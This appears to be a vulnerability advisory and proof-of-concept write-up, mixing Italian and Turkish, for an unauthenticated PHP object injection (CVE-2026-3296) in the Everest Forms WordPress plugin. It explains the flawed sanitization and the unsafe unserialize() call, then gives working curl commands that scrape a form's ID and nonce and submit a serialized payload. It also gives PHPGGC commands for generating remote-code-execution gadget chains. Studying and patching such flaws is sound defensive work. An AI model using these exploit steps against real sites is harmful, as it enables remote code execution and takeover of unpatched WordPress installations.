
CVE-2026-3296 è una vulnerabilità critica (CVSS 9.8) di iniezione di oggetti PHP non autenticata nel plugin Everest Forms per WordPress.
CVE-2026-3296 è una vulnerabilità critica di PHP Object Injection non autenticata (CVSS 9.8) nel plugin WordPress Everest Forms.
Plugin: Everest Forms – Modulo di contatto, modulo di pagamento, quiz, sondaggio e builder di moduli personalizzati Slug del plugin:
everest-formsCVE ID: CVE-2026-3296 Punteggio CVSS: 9.8 (Critico) Vettore CVSS:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HTipo di vulnerabilità: PHP Object Injection non autenticato → RCE Versioni interessate: <= 3.4.3 Versione con patch: 3.4.4 Data di pubblicazione: 7 aprile 2026 Ricercatore: 0xsabre — Mobikwik / Wordfence
Il plugin Everest Forms chiama la funzione nativa unserialize() di PHP
senza il parametro allowed_classes quando visualizza i metadati
delle voci del form nel pannello di amministrazione.
Un attaccante non autenticato può incorporare un payload PHP object serializzato
in qualsiasi campo pubblico del form e salvarlo nel database.
Quando la voce viene visualizzata tramite il pannello di amministrazione,
viene attivato unserialize() e viene eseguita qualsiasi
POP gadget chain presente nell'ambiente.
| Campo | Valore |
|---|---|
| CVE ID | CVE-2026-3296 |
| CVSS | 9.8 Critico |
| Tipo | PHP Object Injection (Deserializzazione di dati non attendibili) |
| Versione interessata | <= 3.4.3 |
| Versione con patch | 3.4.4 |
| Autenticazione | Non richiesta (iniezione), Admin (attivazione) |
| CWE | CWE-502: Deserializzazione di dati non attendibili |
FAZ 1 — ENJEKSIYON (Kimlik doğrulama gerekmez)
FAZ 2 — TETİKLEME (Admin panel görüntülemesi)
// Her front-end sayfa yüklemesinde tetiklenir
add_action( 'wp', array( $this, 'listen_task' ) );
// line 109 — kullanıcı verisi sanitize edilerek işlenir
$this->do_task( evf_sanitize_entry( wp_unslash( $_POST['everest_forms'] ) ) );
// sanitize_text_field() HTML tag, null byte siler
// PHP serialization karakterlerini (O:, s:, {, }, ;) SİLMEZ
default:
$entry['form_fields'][$key] = sanitize_text_field(
$entry['form_fields'][$key]
);
Questo payload rimane completamente intatto dopo sanitize_text_field():
O:8:"stdClass":1:{s:5:"pwned";s:3:"yes";}
// return $entry; ifadesi foreach döngüsü İÇİNDE
// → Yalnızca ilk alan sanitize edilir, geri kalan alanlar ham kalır
foreach ($entry['form_fields'] as $key => $value) {
...
return $entry; // ← BUG: döngü ilk iterasyonda çıkar
}
$entry_metadata = array(
'entry_id' => $entry_id,
'meta_key' => sanitize_key( $field['meta_key'] ),
'meta_value' => maybe_serialize( $field['value'] ),
// maybe_serialize() düz string'i değiştirmez
// → Serialized object string verbatim yazılır
);
$wpdb->insert( $wpdb->prefix . 'evf_entrymeta', $entry_metadata );
$meta_value = is_serialized( $meta_value )
? $meta_value
: wp_strip_all_tags( $meta_value );
if ( is_serialized( $meta_value ) ) {
$raw_meta_val = unserialize( $meta_value );
// ↑ allowed_classes parametresi YOK
// PHP varsayılanı: TÜM sınıflar instantiate edilebilir
// → POP gadget chain tetiklenir
}
// Bu fonksiyon zaten mevcuttu — sadece çağrılmadı
function evf_maybe_unserialize($data, $options = array()) {
if (is_serialized($data)) {
if (version_compare(PHP_VERSION, '7.1.0', '>=')) {
$options = wp_parse_args($options, array('allowed_classes' => false));
return @unserialize(trim($data), $options); // Güvenli
}
return null;
}
return $data;
}
<!-- Public form HTML'inde gömülü — herkes okuyabilir -->
<input type="hidden" name="_wpnonce123" value="abc123def456">
Il nonce fornisce protezione CSRF, non autenticazione. L'attaccante apre la pagina del form con GET, legge il nonce e poi invia il payload con POST.
┌──────────────────────────────────────────────────────────────┐
│ FAZ 1 — ENJEKSIYON (Unauthenticated) │
│ │
│ GET /contact/ │
│ → form_id=123, nonce=abc123, field=text_xyz │
│ │
│ POST /contact/ │
│ everest_forms[id]=123 │
│ everest_forms[form_fields][text_xyz]=O:8:"Evil":1:{...} │
│ _wpnonce123=abc123 │
│ │ │
│ ├── sanitize_text_field() → serialization korunur │
│ ├── maybe_serialize() → string değişmez │
│ └── wp_evf_entrymeta.meta_value = "O:8:\"Evil\"..." │
└──────────────────────────┬───────────────────────────────────┘
│ (Admin rutin kontrol yapar)
┌──────────────────────────▼───────────────────────────────────┐
│ FAZ 2 — TETİKLEME (Admin Panel) │
│ │
│ GET /wp-admin/admin.php │
│ ?page=evf-entries&form_id=123&view-entry=456 │
│ │ │
│ ├── is_serialized($meta_value) = true │
│ ├── unserialize($meta_value) ← ZAFIYET │
│ │ allowed_classes = (yok) → tüm sınıflar │
│ └── POP gadget chain → __wakeup() / __destruct() │
│ → RCE / File Write / Data Exfil │
└──────────────────────────────────────────────────────────────┘
⚠️ Disclaimer: Questo PoC è fornito esclusivamente per scopi di ricerca sulla sicurezza, educativi e difensivi.
Prerequisiti:
TARGET="https://target-site.example.com/contact/"
# Form ID çıkar
curl -s "$TARGET" | grep -oP 'name="everest_forms\[id\]" value="\K[0-9]+'
# Nonce çıkar
curl -s "$TARGET" | grep -oP '(?<=name="_wpnonce)[0-9]+" value="\K[^"]+'
# Güvenli test — stdClass, magic method yok
PAYLOAD='O:8:"stdClass":2:{s:6:"source";s:14:"CVE-2026-3296";s:6:"pwned";s:3:"yes";}'
Per un ambiente reale, genera una POP chain con PHPGGC:
# WordPress/RCE1 chain
phpggc WordPress/RCE1 system "id" -s
# Monolog chain
phpggc Monolog/RCE1 system "id" -s
FORM_ID="123"
NONCE="abcdef1234"
FIELD="text_abc123"
curl -s -X POST "$TARGET" \
-d "everest_forms[id]=${FORM_ID}" \
-d "everest_forms[form_fields][${FIELD}]=${PAYLOAD}" \
-d "_wpnonce${FORM_ID}=${NONCE}" \
-d "everest_forms[hp][abc]="
Atteso: messaggio di successo del form o reindirizzamento.